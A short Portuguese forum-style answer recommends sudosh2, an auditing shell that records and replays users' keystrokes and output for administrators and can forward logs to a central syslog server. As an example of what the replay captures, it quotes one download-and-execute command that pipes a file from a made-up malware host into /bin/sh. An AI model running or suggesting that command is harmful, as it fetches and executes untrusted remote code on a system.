Confie, mas verifique!
Confira sudosh2 . O sudosh2 é fornecido pelas portas do FreeBSD. Pacotes estão disponíveis para RedHat e Ubuntu. Aqui está a descrição do site deles:
sudosh is an auditing shell filter and can be used as a login shell. Sudosh records all keystrokes and output and can play back the session as just like a VCR.
Sudosh permitirá que você repita a sessão do usuário, o que permitirá que você veja todas as entradas e como o usuário viu. Você vê tudo, pressionamentos de teclas, erros de digitação, backspaces, o que eles editaram em vi
, a saída de wget -O- http://zyxzyxzyxzyx.ru/haxor/malware | /bin/sh
, etc.
É possível enviar logs sudosh para o syslog, para que eles possam ser armazenados em um servidor syslog central longe do sistema.
Note que o sudosh2 é um substituto do sudosh, que foi abandonado pelo autor
Você trabalha em uma instituição acadêmica onde os usuários insistem em ter privilégios de superusuário? Ou você trabalha em uma corporação e quer permitir que os usuários tenham privilégios de superusuário em suas próprias VMs? Essa pode ser a solução para você.